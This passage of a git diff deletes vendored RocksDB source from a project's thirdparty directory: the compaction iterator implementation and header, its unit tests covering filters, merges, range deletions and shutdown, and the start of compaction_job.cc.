-        status_ = Status::InvalidArgument(
-            "merge_operator is not properly initialized.");
-        return;
-      }
-
-      pinned_iters_mgr_.StartPinning();
-      // We know the merge type entry is not hidden, otherwise we would
-      // have hit (A)
-      // We encapsulate the merge related state machine in a different
-      // object to minimize change to the existing flow.
-      Status s = merge_helper_->MergeUntil(input_, range_del_agg_,
-                                           prev_snapshot, bottommost_level_);
-      merge_out_iter_.SeekToFirst();
-
-      if (!s.ok() && !s.IsMergeInProgress()) {
-        status_ = s;
-        return;
-      } else if (merge_out_iter_.Valid()) {
-        // NOTE: key, value, and ikey_ refer to old entries.
-        //       These will be correctly set below.
-        key_ = merge_out_iter_.key();
-        value_ = merge_out_iter_.value();
-        bool valid_key __attribute__((__unused__)) =
-            ParseInternalKey(key_, &ikey_);
-        // MergeUntil stops when it encounters a corrupt key and does not
-        // include them in the result, so we expect the keys here to valid.
-        assert(valid_key);
-        // Keep current_key_ in sync.
-        current_key_.UpdateInternalKey(ikey_.sequence, ikey_.type);
-        key_ = current_key_.GetInternalKey();
-        ikey_.user_key = current_key_.GetUserKey();
-        valid_ = true;
-      } else {
-        // all merge operands were filtered out. reset the user key, since the
-        // batch consumed by the merge operator should not shadow any keys
-        // coming after the merges
-        has_current_user_key_ = false;
-        pinned_iters_mgr_.ReleasePinnedData();
-
-        if (merge_helper_->FilteredUntil(&skip_until)) {
-          need_skip = true;
-        }
-      }
-    } else {
-      // 1. new user key -OR-
-      // 2. different snapshot stripe
-      bool should_delete = range_del_agg_->ShouldDelete(
-          key_, RangeDelAggregator::RangePositioningMode::kForwardTraversal);
-      if (should_delete) {
-        ++iter_stats_.num_record_drop_hidden;
-        ++iter_stats_.num_record_drop_range_del;
-        input_->Next();
-      } else {
-        valid_ = true;
-      }
-    }
-
-    if (need_skip) {
-      input_->Seek(skip_until);
-    }
-  }
-
-  if (!valid_ && IsShuttingDown()) {
-    status_ = Status::ShutdownInProgress();
-  }
-}
-
-void CompactionIterator::PrepareOutput() {
-  // Zeroing out the sequence number leads to better compression.
-  // If this is the bottommost level (no files in lower levels)
-  // and the earliest snapshot is larger than this seqno
-  // and the userkey differs from the last userkey in compaction
-  // then we can squash the seqno to zero.
-
-  // This is safe for TransactionDB write-conflict checking since transactions
-  // only care about sequence number larger than any active snapshots.
-  if ((compaction_ != nullptr && !compaction_->allow_ingest_behind()) &&
-      bottommost_level_ && valid_ && ikey_.sequence <= earliest_snapshot_ &&
-      ikey_.type != kTypeMerge &&
-      !cmp_->Equal(compaction_->GetLargestUserKey(), ikey_.user_key)) {
-    assert(ikey_.type != kTypeDeletion && ikey_.type != kTypeSingleDeletion);
-    ikey_.sequence = 0;
-    current_key_.UpdateInternalKey(0, ikey_.type);
-  }
-}
-
-inline SequenceNumber CompactionIterator::findEarliestVisibleSnapshot(
-    SequenceNumber in, SequenceNumber* prev_snapshot) {
-  assert(snapshots_->size());
-  SequenceNumber prev __attribute__((__unused__)) = kMaxSequenceNumber;
-  for (const auto cur : *snapshots_) {
-    assert(prev == kMaxSequenceNumber || prev <= cur);
-    if (cur >= in) {
-      *prev_snapshot = prev == kMaxSequenceNumber ? 0 : prev;
-      return cur;
-    }
-    prev = cur;
-    assert(prev < kMaxSequenceNumber);
-  }
-  *prev_snapshot = prev;
-  return kMaxSequenceNumber;
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/compaction_iterator.h b/thirdparty/rocksdb/db/compaction_iterator.h
deleted file mode 100644
index cad2386..0000000
--- a/thirdparty/rocksdb/db/compaction_iterator.h
+++ /dev/null
@@ -1,197 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-#pragma once
-
-#include <algorithm>
-#include <deque>
-#include <string>
-#include <vector>
-
-#include "db/compaction.h"
-#include "db/compaction_iteration_stats.h"
-#include "db/merge_helper.h"
-#include "db/pinned_iterators_manager.h"
-#include "db/range_del_aggregator.h"
-#include "options/cf_options.h"
-#include "rocksdb/compaction_filter.h"
-
-namespace rocksdb {
-
-class CompactionEventListener;
-
-class CompactionIterator {
- public:
-  // A wrapper around Compaction. Has a much smaller interface, only what
-  // CompactionIterator uses. Tests can override it.
-  class CompactionProxy {
-   public:
-    explicit CompactionProxy(const Compaction* compaction)
-        : compaction_(compaction) {}
-
-    virtual ~CompactionProxy() = default;
-    virtual int level(size_t compaction_input_level = 0) const {
-      return compaction_->level();
-    }
-    virtual bool KeyNotExistsBeyondOutputLevel(
-        const Slice& user_key, std::vector<size_t>* level_ptrs) const {
-      return compaction_->KeyNotExistsBeyondOutputLevel(user_key, level_ptrs);
-    }
-    virtual bool bottommost_level() const {
-      return compaction_->bottommost_level();
-    }
-    virtual int number_levels() const { return compaction_->number_levels(); }
-    virtual Slice GetLargestUserKey() const {
-      return compaction_->GetLargestUserKey();
-    }
-    virtual bool allow_ingest_behind() const {
-      return compaction_->immutable_cf_options()->allow_ingest_behind;
-    }
-
-   protected:
-    CompactionProxy() = default;
-
-   private:
-    const Compaction* compaction_;
-  };
-
-  CompactionIterator(InternalIterator* input, const Comparator* cmp,
-                     MergeHelper* merge_helper, SequenceNumber last_sequence,
-                     std::vector<SequenceNumber>* snapshots,
-                     SequenceNumber earliest_write_conflict_snapshot, Env* env,
-                     bool expect_valid_internal_key,
-                     RangeDelAggregator* range_del_agg,
-                     const Compaction* compaction = nullptr,
-                     const CompactionFilter* compaction_filter = nullptr,
-                     CompactionEventListener* compaction_listener = nullptr,
-                     const std::atomic<bool>* shutting_down = nullptr);
-
-  // Constructor with custom CompactionProxy, used for tests.
-  CompactionIterator(InternalIterator* input, const Comparator* cmp,
-                     MergeHelper* merge_helper, SequenceNumber last_sequence,
-                     std::vector<SequenceNumber>* snapshots,
-                     SequenceNumber earliest_write_conflict_snapshot, Env* env,
-                     bool expect_valid_internal_key,
-                     RangeDelAggregator* range_del_agg,
-                     std::unique_ptr<CompactionProxy> compaction,
-                     const CompactionFilter* compaction_filter = nullptr,
-                     CompactionEventListener* compaction_listener = nullptr,
-                     const std::atomic<bool>* shutting_down = nullptr);
-
-  ~CompactionIterator();
-
-  void ResetRecordCounts();
-
-  // Seek to the beginning of the compaction iterator output.
-  //
-  // REQUIRED: Call only once.
-  void SeekToFirst();
-
-  // Produces the next record in the compaction.
-  //
-  // REQUIRED: SeekToFirst() has been called.
-  void Next();
-
-  // Getters
-  const Slice& key() const { return key_; }
-  const Slice& value() const { return value_; }
-  const Status& status() const { return status_; }
-  const ParsedInternalKey& ikey() const { return ikey_; }
-  bool Valid() const { return valid_; }
-  const Slice& user_key() const { return current_user_key_; }
-  const CompactionIterationStats& iter_stats() const { return iter_stats_; }
-
- private:
-  // Processes the input stream to find the next output
-  void NextFromInput();
-
-  // Do last preparations before presenting the output to the callee. At this
-  // point this only zeroes out the sequence number if possible for better
-  // compression.
-  void PrepareOutput();
-
-  // Given a sequence number, return the sequence number of the
-  // earliest snapshot that this sequence number is visible in.
-  // The snapshots themselves are arranged in ascending order of
-  // sequence numbers.
-  // Employ a sequential search because the total number of
-  // snapshots are typically small.
-  inline SequenceNumber findEarliestVisibleSnapshot(
-      SequenceNumber in, SequenceNumber* prev_snapshot);
-
-  InternalIterator* input_;
-  const Comparator* cmp_;
-  MergeHelper* merge_helper_;
-  const std::vector<SequenceNumber>* snapshots_;
-  const SequenceNumber earliest_write_conflict_snapshot_;
-  Env* env_;
-  bool expect_valid_internal_key_;
-  RangeDelAggregator* range_del_agg_;
-  std::unique_ptr<CompactionProxy> compaction_;
-  const CompactionFilter* compaction_filter_;
-#ifndef ROCKSDB_LITE
-  CompactionEventListener* compaction_listener_;
-#endif  // ROCKSDB_LITE
-  const std::atomic<bool>* shutting_down_;
-  bool bottommost_level_;
-  bool valid_ = false;
-  bool visible_at_tip_;
-  SequenceNumber earliest_snapshot_;
-  SequenceNumber latest_snapshot_;
-  bool ignore_snapshots_;
-
-  // State
-  //
-  // Points to a copy of the current compaction iterator output (current_key_)
-  // if valid_.
-  Slice key_;
-  // Points to the value in the underlying iterator that corresponds to the
-  // current output.
-  Slice value_;
-  // The status is OK unless compaction iterator encounters a merge operand
-  // while not having a merge operator defined.
-  Status status_;
-  // Stores the user key, sequence number and type of the current compaction
-  // iterator output (or current key in the underlying iterator during
-  // NextFromInput()).
-  ParsedInternalKey ikey_;
-  // Stores whether ikey_.user_key is valid. If set to false, the user key is
-  // not compared against the current key in the underlying iterator.
-  bool has_current_user_key_ = false;
-  bool at_next_ = false;  // If false, the iterator
-  // Holds a copy of the current compaction iterator output (or current key in
-  // the underlying iterator during NextFromInput()).
-  IterKey current_key_;
-  Slice current_user_key_;
-  SequenceNumber current_user_key_sequence_;
-  SequenceNumber current_user_key_snapshot_;
-
-  // True if the iterator has already returned a record for the current key.
-  bool has_outputted_key_ = false;
-
-  // truncated the value of the next key and output it without applying any
-  // compaction rules.  This is used for outputting a put after a single delete.
-  bool clear_and_output_next_key_ = false;
-
-  MergeOutputIterator merge_out_iter_;
-  // PinnedIteratorsManager used to pin input_ Iterator blocks while reading
-  // merge operands and then releasing them after consuming them.
-  PinnedIteratorsManager pinned_iters_mgr_;
-  std::string compaction_filter_value_;
-  InternalKey compaction_filter_skip_until_;
-  // "level_ptrs" holds indices that remember which file of an associated
-  // level we were last checking during the last call to compaction->
-  // KeyNotExistsBeyondOutputLevel(). This allows future calls to the function
-  // to pick off where it left off since each subcompaction's key range is
-  // increasing so a later call to the function must be looking for a key that
-  // is in or beyond the last file checked during the previous call
-  std::vector<size_t> level_ptrs_;
-  CompactionIterationStats iter_stats_;
-
-  bool IsShuttingDown() {
-    // This is a best-effort facility, so memory_order_relaxed is sufficient.
-    return shutting_down_ && shutting_down_->load(std::memory_order_relaxed);
-  }
-};
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/db/compaction_iterator_test.cc b/thirdparty/rocksdb/db/compaction_iterator_test.cc
deleted file mode 100644
index dfc4139..0000000
--- a/thirdparty/rocksdb/db/compaction_iterator_test.cc
+++ /dev/null
@@ -1,568 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include "db/compaction_iterator.h"
-
-#include <string>
-#include <vector>
-
-#include "port/port.h"
-#include "util/testharness.h"
-#include "util/testutil.h"
-
-namespace rocksdb {
-
-// Expects no merging attempts.
-class NoMergingMergeOp : public MergeOperator {
- public:
-  bool FullMergeV2(const MergeOperationInput& merge_in,
-                   MergeOperationOutput* merge_out) const override {
-    ADD_FAILURE();
-    return false;
-  }
-  bool PartialMergeMulti(const Slice& key,
-                         const std::deque<Slice>& operand_list,
-                         std::string* new_value,
-                         Logger* logger) const override {
-    ADD_FAILURE();
-    return false;
-  }
-  const char* Name() const override {
-    return "CompactionIteratorTest NoMergingMergeOp";
-  }
-};
-
-// Compaction filter that gets stuck when it sees a particular key,
-// then gets unstuck when told to.
-// Always returns Decition::kRemove.
-class StallingFilter : public CompactionFilter {
- public:
-  virtual Decision FilterV2(int level, const Slice& key, ValueType t,
-                            const Slice& existing_value, std::string* new_value,
-                            std::string* skip_until) const override {
-    int k = std::atoi(key.ToString().c_str());
-    last_seen.store(k);
-    while (k >= stall_at.load()) {
-      std::this_thread::yield();
-    }
-    return Decision::kRemove;
-  }
-
-  const char* Name() const override {
-    return "CompactionIteratorTest StallingFilter";
-  }
-
-  // Wait until the filter sees a key >= k and stalls at that key.
-  // If `exact`, asserts that the seen key is equal to k.
-  void WaitForStall(int k, bool exact = true) {
-    stall_at.store(k);
-    while (last_seen.load() < k) {
-      std::this_thread::yield();
-    }
-    if (exact) {
-      EXPECT_EQ(k, last_seen.load());
-    }
-  }
-
-  // Filter will stall on key >= stall_at. Advance stall_at to unstall.
-  mutable std::atomic<int> stall_at{0};
-  // Last key the filter was called with.
-  mutable std::atomic<int> last_seen{0};
-};
-
-class LoggingForwardVectorIterator : public InternalIterator {
- public:
-  struct Action {
-    enum class Type {
-      SEEK_TO_FIRST,
-      SEEK,
-      NEXT,
-    };
-
-    Type type;
-    std::string arg;
-
-    explicit Action(Type _type, std::string _arg = "")
-        : type(_type), arg(_arg) {}
-
-    bool operator==(const Action& rhs) const {
-      return std::tie(type, arg) == std::tie(rhs.type, rhs.arg);
-    }
-  };
-
-  LoggingForwardVectorIterator(const std::vector<std::string>& keys,
-                               const std::vector<std::string>& values)
-      : keys_(keys), values_(values), current_(keys.size()) {
-    assert(keys_.size() == values_.size());
-  }
-
-  virtual bool Valid() const override { return current_ < keys_.size(); }
-
-  virtual void SeekToFirst() override {
-    log.emplace_back(Action::Type::SEEK_TO_FIRST);
-    current_ = 0;
-  }
-  virtual void SeekToLast() override { assert(false); }
-
-  virtual void Seek(const Slice& target) override {
-    log.emplace_back(Action::Type::SEEK, target.ToString());
-    current_ = std::lower_bound(keys_.begin(), keys_.end(), target.ToString()) -
-               keys_.begin();
-  }
-
-  virtual void SeekForPrev(const Slice& target) override { assert(false); }
-
-  virtual void Next() override {
-    assert(Valid());
-    log.emplace_back(Action::Type::NEXT);
-    current_++;
-  }
-  virtual void Prev() override { assert(false); }
-
-  virtual Slice key() const override {
-    assert(Valid());
-    return Slice(keys_[current_]);
-  }
-  virtual Slice value() const override {
-    assert(Valid());
-    return Slice(values_[current_]);
-  }
-
-  virtual Status status() const override { return Status::OK(); }
-
-  std::vector<Action> log;
-
- private:
-  std::vector<std::string> keys_;
-  std::vector<std::string> values_;
-  size_t current_;
-};
-
-class FakeCompaction : public CompactionIterator::CompactionProxy {
- public:
-  FakeCompaction() = default;
-
-  virtual int level(size_t compaction_input_level) const { return 0; }
-  virtual bool KeyNotExistsBeyondOutputLevel(
-      const Slice& user_key, std::vector<size_t>* level_ptrs) const {
-    return key_not_exists_beyond_output_level;
-  }
-  virtual bool bottommost_level() const { return false; }
-  virtual int number_levels() const { return 1; }
-  virtual Slice GetLargestUserKey() const {
-    return "\xff\xff\xff\xff\xff\xff\xff\xff\xff";
-  }
-  virtual bool allow_ingest_behind() const { return false; }
-
-  bool key_not_exists_beyond_output_level = false;
-};
-
-class CompactionIteratorTest : public testing::Test {
- public:
-  CompactionIteratorTest()
-      : cmp_(BytewiseComparator()), icmp_(cmp_), snapshots_({}) {}
-
-  void InitIterators(const std::vector<std::string>& ks,
-                     const std::vector<std::string>& vs,
-                     const std::vector<std::string>& range_del_ks,
-                     const std::vector<std::string>& range_del_vs,
-                     SequenceNumber last_sequence,
-                     MergeOperator* merge_op = nullptr,
-                     CompactionFilter* filter = nullptr) {
-    std::unique_ptr<InternalIterator> range_del_iter(
-        new test::VectorIterator(range_del_ks, range_del_vs));
-    range_del_agg_.reset(new RangeDelAggregator(icmp_, snapshots_));
-    ASSERT_OK(range_del_agg_->AddTombstones(std::move(range_del_iter)));
-
-    std::unique_ptr<CompactionIterator::CompactionProxy> compaction;
-    if (filter) {
-      compaction_proxy_ = new FakeCompaction();
-      compaction.reset(compaction_proxy_);
-    }
-
-    merge_helper_.reset(new MergeHelper(Env::Default(), cmp_, merge_op, filter,
-                                        nullptr, false, 0, 0, nullptr,
-                                        &shutting_down_));
-    iter_.reset(new LoggingForwardVectorIterator(ks, vs));
-    iter_->SeekToFirst();
-    c_iter_.reset(new CompactionIterator(
-        iter_.get(), cmp_, merge_helper_.get(), last_sequence, &snapshots_,
-        kMaxSequenceNumber, Env::Default(), false, range_del_agg_.get(),
-        std::move(compaction), filter, nullptr, &shutting_down_));
-  }
-
-  void AddSnapshot(SequenceNumber snapshot) { snapshots_.push_back(snapshot); }
-
-  const Comparator* cmp_;
-  const InternalKeyComparator icmp_;
-  std::vector<SequenceNumber> snapshots_;
-  std::unique_ptr<MergeHelper> merge_helper_;
-  std::unique_ptr<LoggingForwardVectorIterator> iter_;
-  std::unique_ptr<CompactionIterator> c_iter_;
-  std::unique_ptr<RangeDelAggregator> range_del_agg_;
-  std::atomic<bool> shutting_down_{false};
-  FakeCompaction* compaction_proxy_;
-};
-
-// It is possible that the output of the compaction iterator is empty even if
-// the input is not.
-TEST_F(CompactionIteratorTest, EmptyResult) {
-  InitIterators({test::KeyStr("a", 5, kTypeSingleDeletion),
-                 test::KeyStr("a", 3, kTypeValue)},
-                {"", "val"}, {}, {}, 5);
-  c_iter_->SeekToFirst();
-  ASSERT_FALSE(c_iter_->Valid());
-}
-
-// If there is a corruption after a single deletion, the corrupted key should
-// be preserved.
-TEST_F(CompactionIteratorTest, CorruptionAfterSingleDeletion) {
-  InitIterators({test::KeyStr("a", 5, kTypeSingleDeletion),
-                 test::KeyStr("a", 3, kTypeValue, true),
-                 test::KeyStr("b", 10, kTypeValue)},
-                {"", "val", "val2"}, {}, {}, 10);
-  c_iter_->SeekToFirst();
-  ASSERT_TRUE(c_iter_->Valid());
-  ASSERT_EQ(test::KeyStr("a", 5, kTypeSingleDeletion),
-            c_iter_->key().ToString());
-  c_iter_->Next();
-  ASSERT_TRUE(c_iter_->Valid());
-  ASSERT_EQ(test::KeyStr("a", 3, kTypeValue, true), c_iter_->key().ToString());
-  c_iter_->Next();
-  ASSERT_TRUE(c_iter_->Valid());
-  ASSERT_EQ(test::KeyStr("b", 10, kTypeValue), c_iter_->key().ToString());
-  c_iter_->Next();
-  ASSERT_FALSE(c_iter_->Valid());
-}
-
-TEST_F(CompactionIteratorTest, SimpleRangeDeletion) {
-  InitIterators({test::KeyStr("morning", 5, kTypeValue),
-                 test::KeyStr("morning", 2, kTypeValue),
-                 test::KeyStr("night", 3, kTypeValue)},
-                {"zao", "zao", "wan"},
-                {test::KeyStr("ma", 4, kTypeRangeDeletion)}, {"mz"}, 5);
-  c_iter_->SeekToFirst();
-  ASSERT_TRUE(c_iter_->Valid());
-  ASSERT_EQ(test::KeyStr("morning", 5, kTypeValue), c_iter_->key().ToString());
-  c_iter_->Next();
-  ASSERT_TRUE(c_iter_->Valid());
-  ASSERT_EQ(test::KeyStr("night", 3, kTypeValue), c_iter_->key().ToString());
-  c_iter_->Next();
-  ASSERT_FALSE(c_iter_->Valid());
-}
-
-TEST_F(CompactionIteratorTest, RangeDeletionWithSnapshots) {
-  AddSnapshot(10);
-  std::vector<std::string> ks1;
-  ks1.push_back(test::KeyStr("ma", 28, kTypeRangeDeletion));
-  std::vector<std::string> vs1{"mz"};
-  std::vector<std::string> ks2{test::KeyStr("morning", 15, kTypeValue),
-                               test::KeyStr("morning", 5, kTypeValue),
-                               test::KeyStr("night", 40, kTypeValue),
-                               test::KeyStr("night", 20, kTypeValue)};
-  std::vector<std::string> vs2{"zao 15", "zao 5", "wan 40", "wan 20"};
-  InitIterators(ks2, vs2, ks1, vs1, 40);
-  c_iter_->SeekToFirst();
-  ASSERT_TRUE(c_iter_->Valid());
-  ASSERT_EQ(test::KeyStr("morning", 5, kTypeValue), c_iter_->key().ToString());
-  c_iter_->Next();
-  ASSERT_TRUE(c_iter_->Valid());
-  ASSERT_EQ(test::KeyStr("night", 40, kTypeValue), c_iter_->key().ToString());
-  c_iter_->Next();
-  ASSERT_FALSE(c_iter_->Valid());
-}
-
-TEST_F(CompactionIteratorTest, CompactionFilterSkipUntil) {
-  class Filter : public CompactionFilter {
-    virtual Decision FilterV2(int level, const Slice& key, ValueType t,
-                              const Slice& existing_value,
-                              std::string* new_value,
-                              std::string* skip_until) const override {
-      std::string k = key.ToString();
-      std::string v = existing_value.ToString();
-      // See InitIterators() call below for the sequence of keys and their
-      // filtering decisions. Here we closely assert that compaction filter is
-      // called with the expected keys and only them, and with the right values.
-      if (k == "a") {
-        EXPECT_EQ(ValueType::kValue, t);
-        EXPECT_EQ("av50", v);
-        return Decision::kKeep;
-      }
-      if (k == "b") {
-        EXPECT_EQ(ValueType::kValue, t);
-        EXPECT_EQ("bv60", v);
-        *skip_until = "d+";
-        return Decision::kRemoveAndSkipUntil;
-      }
-      if (k == "e") {
-        EXPECT_EQ(ValueType::kMergeOperand, t);
-        EXPECT_EQ("em71", v);
-        return Decision::kKeep;
-      }
-      if (k == "f") {
-        if (v == "fm65") {
-          EXPECT_EQ(ValueType::kMergeOperand, t);
-          *skip_until = "f";
-        } else {
-          EXPECT_EQ("fm30", v);
-          EXPECT_EQ(ValueType::kMergeOperand, t);
-          *skip_until = "g+";
-        }
-        return Decision::kRemoveAndSkipUntil;
-      }
-      if (k == "h") {
-        EXPECT_EQ(ValueType::kValue, t);
-        EXPECT_EQ("hv91", v);
-        return Decision::kKeep;
-      }
-      if (k == "i") {
-        EXPECT_EQ(ValueType::kMergeOperand, t);
-        EXPECT_EQ("im95", v);
-        *skip_until = "z";
-        return Decision::kRemoveAndSkipUntil;
-      }
-      ADD_FAILURE();
-      return Decision::kKeep;
-    }
-
-    const char* Name() const override {
-      return "CompactionIteratorTest.CompactionFilterSkipUntil::Filter";
-    }
-  };
-
-  NoMergingMergeOp merge_op;
-  Filter filter;
-  InitIterators(
-      {test::KeyStr("a", 50, kTypeValue),  // keep
-       test::KeyStr("a", 45, kTypeMerge),
-       test::KeyStr("b", 60, kTypeValue),  // skip to "d+"
-       test::KeyStr("b", 40, kTypeValue), test::KeyStr("c", 35, kTypeValue),
-       test::KeyStr("d", 70, kTypeMerge),
-       test::KeyStr("e", 71, kTypeMerge),  // keep
-       test::KeyStr("f", 65, kTypeMerge),  // skip to "f", aka keep
-       test::KeyStr("f", 30, kTypeMerge),  // skip to "g+"
-       test::KeyStr("f", 25, kTypeValue), test::KeyStr("g", 90, kTypeValue),
-       test::KeyStr("h", 91, kTypeValue),  // keep
-       test::KeyStr("i", 95, kTypeMerge),  // skip to "z"
-       test::KeyStr("j", 99, kTypeValue)},
-      {"av50", "am45", "bv60", "bv40", "cv35", "dm70", "em71", "fm65", "fm30",
-       "fv25", "gv90", "hv91", "im95", "jv99"},
-      {}, {}, kMaxSequenceNumber, &merge_op, &filter);
-
-  // Compaction should output just "a", "e" and "h" keys.
-  c_iter_->SeekToFirst();
-  ASSERT_TRUE(c_iter_->Valid());
-  ASSERT_EQ(test::KeyStr("a", 50, kTypeValue), c_iter_->key().ToString());
-  ASSERT_EQ("av50", c_iter_->value().ToString());
-  c_iter_->Next();
-  ASSERT_TRUE(c_iter_->Valid());
-  ASSERT_EQ(test::KeyStr("e", 71, kTypeMerge), c_iter_->key().ToString());
-  ASSERT_EQ("em71", c_iter_->value().ToString());
-  c_iter_->Next();
-  ASSERT_TRUE(c_iter_->Valid());
-  ASSERT_EQ(test::KeyStr("h", 91, kTypeValue), c_iter_->key().ToString());
-  ASSERT_EQ("hv91", c_iter_->value().ToString());
-  c_iter_->Next();
-  ASSERT_FALSE(c_iter_->Valid());
-
-  // Check that the compaction iterator did the correct sequence of calls on
-  // the underlying iterator.
-  using A = LoggingForwardVectorIterator::Action;
-  using T = A::Type;
-  std::vector<A> expected_actions = {
-      A(T::SEEK_TO_FIRST),
-      A(T::NEXT),
-      A(T::NEXT),
-      A(T::SEEK, test::KeyStr("d+", kMaxSequenceNumber, kValueTypeForSeek)),
-      A(T::NEXT),
-      A(T::NEXT),
-      A(T::SEEK, test::KeyStr("g+", kMaxSequenceNumber, kValueTypeForSeek)),
-      A(T::NEXT),
-      A(T::SEEK, test::KeyStr("z", kMaxSequenceNumber, kValueTypeForSeek))};
-  ASSERT_EQ(expected_actions, iter_->log);
-}
-
-TEST_F(CompactionIteratorTest, ShuttingDownInFilter) {
-  NoMergingMergeOp merge_op;
-  StallingFilter filter;
-  InitIterators(
-      {test::KeyStr("1", 1, kTypeValue), test::KeyStr("2", 2, kTypeValue),
-       test::KeyStr("3", 3, kTypeValue), test::KeyStr("4", 4, kTypeValue)},
-      {"v1", "v2", "v3", "v4"}, {}, {}, kMaxSequenceNumber, &merge_op, &filter);
-  // Don't leave tombstones (kTypeDeletion) for filtered keys.
-  compaction_proxy_->key_not_exists_beyond_output_level = true;
-
-  std::atomic<bool> seek_done{false};
-  rocksdb::port::Thread compaction_thread([&] {
-    c_iter_->SeekToFirst();
-    EXPECT_FALSE(c_iter_->Valid());
-    EXPECT_TRUE(c_iter_->status().IsShutdownInProgress());
-    seek_done.store(true);
-  });
-
-  // Let key 1 through.
-  filter.WaitForStall(1);
-
-  // Shutdown during compaction filter call for key 2.
-  filter.WaitForStall(2);
-  shutting_down_.store(true);
-  EXPECT_FALSE(seek_done.load());
-
-  // Unstall filter and wait for SeekToFirst() to return.
-  filter.stall_at.store(3);
-  compaction_thread.join();
-  assert(seek_done.load());
-
-  // Check that filter was never called again.
-  EXPECT_EQ(2, filter.last_seen.load());
-}
-
-// Same as ShuttingDownInFilter, but shutdown happens during filter call for
-// a merge operand, not for a value.
-TEST_F(CompactionIteratorTest, ShuttingDownInMerge) {
-  NoMergingMergeOp merge_op;
-  StallingFilter filter;
-  InitIterators(
-      {test::KeyStr("1", 1, kTypeValue), test::KeyStr("2", 2, kTypeMerge),
-       test::KeyStr("3", 3, kTypeMerge), test::KeyStr("4", 4, kTypeValue)},
-      {"v1", "v2", "v3", "v4"}, {}, {}, kMaxSequenceNumber, &merge_op, &filter);
-  compaction_proxy_->key_not_exists_beyond_output_level = true;
-
-  std::atomic<bool> seek_done{false};
-  rocksdb::port::Thread compaction_thread([&] {
-    c_iter_->SeekToFirst();
-    ASSERT_FALSE(c_iter_->Valid());
-    ASSERT_TRUE(c_iter_->status().IsShutdownInProgress());
-    seek_done.store(true);
-  });
-
-  // Let key 1 through.
-  filter.WaitForStall(1);
-
-  // Shutdown during compaction filter call for key 2.
-  filter.WaitForStall(2);
-  shutting_down_.store(true);
-  EXPECT_FALSE(seek_done.load());
-
-  // Unstall filter and wait for SeekToFirst() to return.
-  filter.stall_at.store(3);
-  compaction_thread.join();
-  assert(seek_done.load());
-
-  // Check that filter was never called again.
-  EXPECT_EQ(2, filter.last_seen.load());
-}
-
-TEST_F(CompactionIteratorTest, SingleMergeOperand) {
-  class Filter : public CompactionFilter {
-    virtual Decision FilterV2(int level, const Slice& key, ValueType t,
-                              const Slice& existing_value,
-                              std::string* new_value,
-                              std::string* skip_until) const override {
-      std::string k = key.ToString();
-      std::string v = existing_value.ToString();
-
-      // See InitIterators() call below for the sequence of keys and their
-      // filtering decisions. Here we closely assert that compaction filter is
-      // called with the expected keys and only them, and with the right values.
-      if (k == "a") {
-        EXPECT_EQ(ValueType::kMergeOperand, t);
-        EXPECT_EQ("av1", v);
-        return Decision::kKeep;
-      } else if (k == "b") {
-        EXPECT_EQ(ValueType::kMergeOperand, t);
-        return Decision::kKeep;
-      } else if (k == "c") {
-        return Decision::kKeep;
-      }
-
-      ADD_FAILURE();
-      return Decision::kKeep;
-    }
-
-    const char* Name() const override {
-      return "CompactionIteratorTest.SingleMergeOperand::Filter";
-    }
-  };
-
-  class SingleMergeOp : public MergeOperator {
-   public:
-    bool FullMergeV2(const MergeOperationInput& merge_in,
-                     MergeOperationOutput* merge_out) const override {
-      // See InitIterators() call below for why "c" is the only key for which
-      // FullMergeV2 should be called.
-      EXPECT_EQ("c", merge_in.key.ToString());
-
-      std::string temp_value;
-      if (merge_in.existing_value != nullptr) {
-        temp_value = merge_in.existing_value->ToString();
-      }
-
-      for (auto& operand : merge_in.operand_list) {
-        temp_value.append(operand.ToString());
-      }
-      merge_out->new_value = temp_value;
-
-      return true;
-    }
-
-    bool PartialMergeMulti(const Slice& key,
-                           const std::deque<Slice>& operand_list,
-                           std::string* new_value,
-                           Logger* logger) const override {
-      std::string string_key = key.ToString();
-      EXPECT_TRUE(string_key == "a" || string_key == "b");
-
-      if (string_key == "a") {
-        EXPECT_EQ(1, operand_list.size());
-      } else if (string_key == "b") {
-        EXPECT_EQ(2, operand_list.size());
-      }
-
-      std::string temp_value;
-      for (auto& operand : operand_list) {
-        temp_value.append(operand.ToString());
-      }
-      swap(temp_value, *new_value);
-
-      return true;
-    }
-
-    const char* Name() const override {
-      return "CompactionIteratorTest SingleMergeOp";
-    }
-
-    bool AllowSingleOperand() const override { return true; }
-  };
-
-  SingleMergeOp merge_op;
-  Filter filter;
-  InitIterators(
-      // a should invoke PartialMergeMulti with a single merge operand.
-      {test::KeyStr("a", 50, kTypeMerge),
-       // b should invoke PartialMergeMulti with two operands.
-       test::KeyStr("b", 70, kTypeMerge), test::KeyStr("b", 60, kTypeMerge),
-       // c should invoke FullMerge due to kTypeValue at the beginning.
-       test::KeyStr("c", 90, kTypeMerge), test::KeyStr("c", 80, kTypeValue)},
-      {"av1", "bv2", "bv1", "cv2", "cv1"}, {}, {}, kMaxSequenceNumber,
-      &merge_op, &filter);
-
-  c_iter_->SeekToFirst();
-  ASSERT_TRUE(c_iter_->Valid());
-  ASSERT_EQ(test::KeyStr("a", 50, kTypeMerge), c_iter_->key().ToString());
-  ASSERT_EQ("av1", c_iter_->value().ToString());
-  c_iter_->Next();
-  ASSERT_TRUE(c_iter_->Valid());
-  ASSERT_EQ("bv1bv2", c_iter_->value().ToString());
-  c_iter_->Next();
-  ASSERT_EQ("cv1cv2", c_iter_->value().ToString());
-}
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
diff --git a/thirdparty/rocksdb/db/compaction_job.cc b/thirdparty/rocksdb/db/compaction_job.cc
deleted file mode 100644
index 1d023ca..0000000
--- a/thirdparty/rocksdb/db/compaction_job.cc
+++ /dev/null
@@ -1,1471 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
